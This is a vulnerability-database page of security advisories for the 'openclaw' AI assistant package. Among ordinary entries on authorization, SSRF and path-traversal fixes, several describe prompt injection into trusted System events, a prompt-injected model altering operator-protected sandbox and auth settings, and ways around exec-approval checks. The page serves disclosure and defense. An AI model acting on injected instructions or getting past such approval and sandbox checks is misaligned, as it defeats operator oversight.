OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation ## Summary Feishu webhook reads and parses unauthenticated request bodies before signature validation ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Feishu webhook handling previously parsed JSON before signature validation, which let unauthenticated callers force full JSON parsing work before rejection. Commit `5e8cb22176e9235e224be0bc530699261eb60e53` reads the raw request body, validates the signature first, and only then parses JSON. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e8cb22176e9235e224be0bc530699261eb60e53`. ## Fix Commit(s) - `5e8cb22176e9235e224be0bc530699261eb60e53` |
Affected by 150 other vulnerabilities. |
|
VCID-4urc-4536-pqhk
Aliases: GHSA-gfmx-pph7-g46x |
OpenClaw: Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade ## Impact Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade. Lower-trust runtime/background output could be promoted into trusted System events, allowing prompt-injection into later agent turns. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @tdjackey for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-5atj-2a7b-57g5
Aliases: CVE-2026-41344 GHSA-5h2w-qmfp-ggp6 |
OpenClaw: Gateway `operator.write` can reach admin-only persisted `verboseLevel` via `chat.send` `/verbose` ## Summary The `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`. ## Impact A write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended. ## Affected Component `src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`). |
Affected by 150 other vulnerabilities. |
|
VCID-5dj5-mk23-kyds
Aliases: GHSA-j42q-r6qx-xrfp |
Duplicate Advisory: OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-52q4-3xjc-6778. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Google Chat group policy enforcement that relies on mutable space display names. Attackers can rebind group policies by changing or colliding space display names to gain unauthorized access to protected resources. | There are no reported fixed by versions. |
|
VCID-5rgx-2krs-guck
Aliases: CVE-2026-41396 GHSA-qcj9-wwgw-6gm8 |
OpenClaw: Workspace `.env` can override the bundled plugin trust root ## Summary Workspace `.env` can override the bundled plugin trust root ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-66nc-bn98-nbas
Aliases: GHSA-m5jp-p3r5-mfqp |
Duplicate Advisory: OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin` ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-h4jx-hjr3-fhgc. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion without a request-scoped client to execute privileged operations with unintended administrative scope. | There are no reported fixed by versions. |
|
VCID-6849-th74-yqd5
Aliases: CVE-2026-33578 GHSA-63mg-xp9j-jfcm |
OpenClaw: Google Chat and Zalouser group sender allowlist bypass via policy downgrade ## Summary When only a route-level group allowlist was configured, sender policy resolution silently downgraded from `allowlist` to `open` instead of preserving the configured group policy. ## Impact Any member of an allowlisted Google Chat space or Zalouser group could interact with the bot even when the operator intended sender-level restrictions. ## Affected Component `extensions/googlechat/src/monitor-access.ts, extensions/zalouser/src/monitor.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `e64a881ae0` (`Channels: preserve routed group policy`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-6bxd-kbse-sudx
Aliases: GHSA-mw7w-g3mg-xqm7 |
OpenClaw: BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events ## Summary BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details BlueBubbles group reaction events previously bypassed `requireMention` and still enqueued agent-visible system events in groups that were supposed to stay mention-gated. Commit `f8c98630785288cc1f1d0893503ef3b653a3cede` applies the reaction path to the same mention gate as normal group messages. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f8c98630785288cc1f1d0893503ef3b653a3cede`. ## Fix Commit(s) - `f8c98630785288cc1f1d0893503ef3b653a3cede` | There are no reported fixed by versions. |
|
VCID-6wth-qthz-yud8
Aliases: CVE-2026-42436 GHSA-c4qm-58hj-j6pj |
OpenClaw: Browser snapshot and screenshot routes could expose internal page content after navigation ## Summary Browser snapshot and screenshot routes could expose internal page content after navigation. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Authenticated browser tool callers could use snapshot, screenshot, or tab routes that did not consistently validate the final browser target after route-driven navigation. In restrictive browser SSRF configurations this could expose content from internal or otherwise disallowed pages. ## Technical Details The fix re-checks browser snapshot, screenshot, and tab route results against the configured browser SSRF policy before returning page content. Regression coverage was added around snapshot/screenshot and tab-route flows. ## Fix The issue was fixed in #66040. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `b75ad800a59009fc47eaa3471410f69046150e59` - PR: #66040 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-6y5w-am4s-6qa5
Aliases: CVE-2026-43530 GHSA-2cq5-mf3v-mx44 |
OpenClaw: busybox and toybox applet execution weakened exec approval binding ## Summary busybox and toybox applet execution weakened exec approval binding. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.23 < 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact Opaque multi-call binaries such as `busybox` and `toybox` could obscure which applet or script-like behavior would actually run, weakening exec approval binding and risk classification. ## Technical Details The fix treats `busybox` and `toybox` as opaque mutable script runners and fails closed rather than binding unsafe applet invocations. ## Fix The issue was fixed in #65713. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `666f48d9b882a8a1415ca53f9567c72499d850c9` - PR: #65713 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @decsecre583 for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-733f-57ds-xugm
Aliases: GHSA-rf75-g96h-j3rm |
Duplicate Advisory: OpenClaw's complex interpreter pipelines could skip exec script preflight validation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references. ### Original Description OpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked. |
Affected by 80 other vulnerabilities. |
|
VCID-73cz-n29z-uqem
Aliases: GHSA-pg8g-f2hf-x82m |
Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins. |
Affected by 60 other vulnerabilities. |
|
VCID-75yr-sbce-nkah
Aliases: CVE-2026-41914 GHSA-3fv3-6p2v-gxwj |
OpenClaw QQ Bot Extension missing SSRF Protection on All Media Fetch Paths ## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. QQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @adithyan-ak for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-7akj-469t-57hz
Aliases: GHSA-7jm2-g593-4qrc |
OpenClaw: Agent gateway config mutations could change protected operator settings ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact The agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings. This is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium. ## Fix OpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching. Fix commit: - `fe30b31a97a917ecc6e92f6c85378b6b20352422` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-7dyw-9b37-yqh4
Aliases: CVE-2026-41402 GHSA-hhq4-97c2-p447 |
OpenClaw: Zalo webhook replay cache cross-target messageId scope bypass ## Summary Zalo webhook replay cache cross-target messageId scope bypass ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: v2026.3.28 replay dedupe is still keyed too broadly, but the issue should stay scoped to authenticated sibling-target delivery paths rather than arbitrary unauthenticated attackers. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — 2026-03-31T19:33:57+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-7ntr-5dr5-9uf8
Aliases: GHSA-98ch-45wp-ch47 |
OpenClaw: Windows-compatible env override keys could bypass system.run approval binding ## Summary Before OpenClaw 2026.4.2, system-run approval binding normalized environment override keys differently from host execution. Windows-compatible keys could be omitted from the approval binding while still being injected at execution time. ## Impact An approved command could run with attacker-chosen environment overrides that were not represented in the approval binding. This created an approval-integrity gap for affected host-exec flows. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d` — align approval binding with execution-time env-key normalization ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @iskindar for reporting, and thanks @wsparks-vc for coordination. |
Affected by 80 other vulnerabilities. |
|
VCID-7snr-fn3u-x3b8
Aliases: CVE-2026-43582 GHSA-xq94-r468-qwgj |
OpenClaw: Browser SSRF hostname validation could be bypassed by DNS rebinding ## Summary Browser SSRF hostname validation could be bypassed by DNS rebinding. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Browser navigation policy could validate a hostname/IP resolution that differed from the address Chromium ultimately used, allowing DNS rebinding style SSRF pivots. ## Technical Details The fix tightens strict browser hostname navigation so unallowlisted hostname URLs fail closed under restrictive policy. ## Fix The issue was fixed in #64367. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `121c452d666d4749744dc2089287d0227aae2ed3` - PR: #64367 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-7wmr-v7zb-6fc9
Aliases: CVE-2026-41392 GHSA-wpc6-37g7-8q4w |
OpenClaw: Shell init-file options could satisfy exec allowlist script matching ## Summary Before OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first. ## Impact This issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.3.31` - Patched versions: `>= 2026.3.31` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `0c8375424620e12777ef24c162eedc7e9fcfd7e3` — reject shell init-file script matches ## Release Process Note The fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix. Thanks @cyjhhh for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-7z2s-k6ty-ekg1
Aliases: CVE-2026-41298 GHSA-5hff-46vh-rxmw |
OpenClaw: Read-scoped identity-bearing HTTP clients could kill sessions via /sessions/:sessionKey/kill ## Summary Before OpenClaw 2026.4.2, `POST /sessions/:sessionKey/kill` did not enforce write scopes in identity-bearing HTTP modes. A caller limited to read-only operator scopes could still terminate a running subagent session. ## Impact A read-scoped caller could perform a write-class control-plane mutation and interrupt delegated work. This was an authorization bug on the HTTP scope boundary, not a shared-secret compatibility exception. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `54a0878517167c6e49900498cf77420dadb74beb` — enforce session-kill HTTP scopes ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @EaEa0001 for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-8uzb-xmf8-hbca
Aliases: CVE-2026-32846 GHSA-hggm-x7r9-mm7v |
OpenClaw is vulnerable to Path Traversal through path validation bypass OpenClaw through 2026.3.23 (fixed in commit 4797bbc) contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the allowBareFilename bypass to reference files outside the intended application sandbox, resulting in disclosure of sensitive information including system files, environment files, and SSH keys. |
Affected by 150 other vulnerabilities. |
|
VCID-96jd-x87b-s3ey
Aliases: CVE-2026-41407 GHSA-jj6q-rrrf-h66h |
OpenClaw: Shared-secret comparison call sites leaked length information through timing ## Summary Before OpenClaw 2026.4.2, several shared-secret comparison call sites still used early length-mismatch checks instead of the shared fixed-length comparison helper. Those paths could leak secret-length information through measurable timing differences. ## Impact The affected paths exposed a low-severity timing side channel on secret comparison. The issue did not by itself demonstrate auth bypass, but it weakened the intended constant-time handling for shared secrets. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `be10ecef770a4654519869c3641bbb91087c8c7b` — reuse the shared secret comparison helper at affected call sites ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-9hcd-uj62-8yeu
Aliases: CVE-2026-43533 GHSA-66r7-m7xm-v49h |
OpenClaw: QQBot media tags could read arbitrary local files through reply text ## Summary QQBot media tags could read arbitrary local files through reply text. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact QQBot outbound media tags in AI reply text could reference host-local paths outside the intended media storage boundary, allowing local file disclosure through outbound media handling. ## Technical Details The fix enforces the media storage boundary for all outbound QQBot local file paths. ## Fix The issue was fixed in #63271. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `604777e4414cc3b2ff8861f18f4fb04374c702c6` - PR: #63271 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-9kgh-wj9w-ykff
Aliases: CVE-2026-43526 GHSA-2767-2q9v-9326 |
OpenClaw: QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes ## Summary QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact QQBot reply media URLs could be treated as trusted media sources, allowing SSRF fetches whose returned bytes were then re-uploaded through the channel. ## Technical Details The fix routes QQBot remote media fetches through SSRF-guarded media fetching and explicit URL allowlist policy. ## Fix The issue was fixed in #63495 and #65788. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a` - `ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d` - PR: #63495, #65788 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @threalwinky for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-9uyu-y9qv-u7e1
Aliases: CVE-2026-35657 GHSA-5jvj-hxmh-6h6j |
OpenClaw: Gateway HTTP Session History Route Bypasses Operator Read Scope ## Summary Gateway HTTP Session History Route Bypasses Operator Read Scope ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details The HTTP `/sessions/:sessionKey/history` route previously authenticated bearer tokens but skipped the same `operator.read` check used by `chat.history` over WebSocket. Commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` makes HTTP callers declare operator scopes and rejects history reads that do not include `operator.read`. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`. ## Fix Commit(s) - `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` |
Affected by 0 other vulnerabilities. Affected by 194 other vulnerabilities. |
|
VCID-9xgq-vtg2-jucq
Aliases: CVE-2026-42426 GHSA-67mf-f936-ppxf |
## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval. The pairing approval method accepted operator.write instead of the narrower pairing scope and admin requirement for exec-capable nodes. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= v2026.04.01` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @nicky-cc of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-9xrt-mv81-3yc8
Aliases: CVE-2026-41400 GHSA-2w79-r9g8-wmcr |
OpenClaw: Voice-call still parses large WebSocket frames before start validation (Incomplete fix for CVE-2026-32062) ## Summary Incomplete fix for CVE-2026-32062: voice-call still parses large WebSocket frames before start validation ## Current Maintainer Triage - Normalized severity: medium - Assessment: v2026.3.28 still parses oversized pre-start voice-call WebSocket frames before start validation, and the unreleased maxPayload fix confirms the shipped resource-consumption bug remains open. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `9abcfdadf591bf266d85fbdfe14ae833e557a110` — 2026-03-31T19:47:10+09:00 OpenClaw thanks @Kazamayc for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-9yxw-fj1c-tff9
Aliases: GHSA-q2qc-744p-66r2 |
OpenClaw: `session_status` sessionId resolution bypasses sandboxed session-tree visibility ## Summary `session_status` sessionId resolution bypasses sandboxed session-tree visibility ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `>= 2026.3.11, <= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details `session_status` previously resolved a `sessionId` to a canonical session key after early visibility checks, letting sandboxed children reach parent or sibling sessions that were blocked by explicit `sessionKey`. Commit `d9810811b6c3c9266d7580f00574e5e02f7663de` enforces visibility after `sessionId` resolution so sandboxed callers cannot escape their session tree. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d9810811b6c3c9266d7580f00574e5e02f7663de`. ## Fix Commit(s) - `d9810811b6c3c9266d7580f00574e5e02f7663de` |
Affected by 150 other vulnerabilities. |
|
VCID-a2p8-ydn6-3bbr
Aliases: CVE-2026-35617 GHSA-52q4-3xjc-6778 |
OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName ## Summary Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Google Chat group authorization previously relied on mutable space display names, which allowed policy rebinding when names changed or collided. Commit `11ea1f67863d88b6cbcb229dd368a45e07094bff` requires stable group IDs for access decisions. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `11ea1f67863d88b6cbcb229dd368a45e07094bff`. ## Fix Commit(s) - `11ea1f67863d88b6cbcb229dd368a45e07094bff` |
Affected by 150 other vulnerabilities. |
|
VCID-a2wx-7b8h-c3h1
Aliases: CVE-2026-41391 GHSA-7ggg-pvrf-458v |
OpenClaw: PIP_INDEX_URL and UV_INDEX_URL bypass host exec env sanitization and redirect Python package-index traffic ## Summary `PIP_INDEX_URL` and `UV_INDEX_URL` bypass host exec env sanitization and redirect Python package-index traffic ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still allows Python package-index env redirection through host exec, but scope should stay limited to approved or allowlisted package-management exec paths, not arbitrary remote execution. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d` — 2026-03-31T09:53:32+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-a46u-tnbh-fyhs
Aliases: GHSA-f934-5rqf-xx47 |
OpenClaw: QMD memory_get restricts reads to canonical or indexed memory paths ## Summary The QMD backend `memory_get` read path accepted arbitrary workspace Markdown paths that were inside the workspace but outside the canonical memory locations or indexed QMD result set. ## Impact When the QMD backend was enabled, a caller with access to `memory_get` could read arbitrary `*.md` files under the configured workspace root, even when those files were not canonical memory files and had not been returned by QMD search. Severity remains low because exploitation requires access to the memory tool surface and is limited to workspace Markdown files, but it bypassed the intended memory-path policy. ## Affected versions - Affected: `< 2026.4.15` - Patched: `2026.4.15` ## Fix OpenClaw `2026.4.15` restricts QMD reads to canonical memory paths or previously indexed QMD workspace paths. Workspace containment alone is no longer sufficient. Verified in `v2026.4.15`: - `extensions/memory-core/src/memory/qmd-manager.ts` rejects non-default workspace Markdown paths unless they match an indexed QMD workspace read path. - `extensions/memory-core/src/memory/qmd-manager.test.ts` covers QMD session search-result reads and the read-path restriction behavior. Fix commit included in `v2026.4.15` and absent from `v2026.4.14`: - `37d5971db36491d5050efd42c333cbe0b98ed292` via PR #66026 Thanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue. |
Affected by 24 other vulnerabilities. |
|
VCID-a4jz-y9s4-zkfg
Aliases: CVE-2026-44991 GHSA-c28g-vh7m-fm7v |
OpenClaw: Owner-enforced commands could accept wildcard channel senders as command owners ## Impact OpenClaw deployments before `2026.4.21` could treat a non-owner sender as authorized for owner-enforced slash commands when all of the following were true: - a channel plugin declared `commands.enforceOwnerForCommands: true`; - the channel accepted wildcard inbound senders with `allowFrom: ["*"]`; - no explicit `commands.ownerAllowFrom` was configured. In that state, `src/auto-reply/command-auth.ts` reused the channel inbound wildcard as part of the command-owner decision. A sender who was not the owner could therefore pass the owner-command gate for commands such as `/send`, `/config`, or `/debug` on the affected channel. The issue is limited to the command-owner authorization axis. It does not by itself grant owner-only tool access, host/sandbox access, or gateway administrator scope. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected versions: `<= 2026.4.20` - Patched version: `2026.4.21` The latest public release, `2026.4.21`, contains the fix. ## Patches The fix requires a concrete owner identity or internal operator-admin scope when a plugin enforces owner-only commands. Wildcard channel `allowFrom` no longer implies wildcard command ownership. Fix commits: - `2aa93d44a1b2c7058c371f261fda2b5d4de4a882` on `main` - `995febb7b1e811ff6a1df5b18c22de94103f4c9f` in the `2026.4.21` release line ## Workarounds Upgrade to `openclaw@2026.4.21` or later. Before upgrading, avoid wildcard/open-DM sender policy on owner-enforced channels, or configure `commands.ownerAllowFrom` to the intended owner identities. ## Credits OpenClaw thanks @zsxsoft for reporting. |
Affected by 11 other vulnerabilities. |
|
VCID-acy1-83py-efhr
Aliases: GHSA-r4c2-gq3j-7rpj |
Duplicate Advisory: OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-vcx4-4qxg-mfp4. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in Telegram webhook authentication that allows attackers to brute-force weak webhook secrets. The vulnerability enables repeated authentication guesses without throttling, permitting attackers to systematically guess webhook secrets through brute-force attacks. | There are no reported fixed by versions. |
|
VCID-arks-g6hw-abbw
Aliases: CVE-2026-43569 GHSA-939r-rj45-g2rj |
OpenClaw: Workspace provider auth choices could auto-enable untrusted provider plugins ## Summary Workspace provider auth choices could auto-enable untrusted provider plugins. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.9` - Patched versions: `>= 2026.4.9` ## Impact Non-interactive onboarding could select a provider auth choice shadowed by an untrusted workspace plugin, auto-enabling that plugin during auth setup. ## Technical Details The fix prefers trusted provider origins for auth choices and excludes untrusted workspace choices unless they are explicitly enabled. ## Fix The issue was fixed in #62368. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `2d97eae53e212ae26f3aebcd6a50ffc6877f770d` - PR: #62368 ## Release Process Note Users should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zpbrent for reporting this issue. |
Affected by 59 other vulnerabilities. |
|
VCID-atn7-pn13-3fgb
Aliases: GHSA-v3qc-wrwx-j3pw |
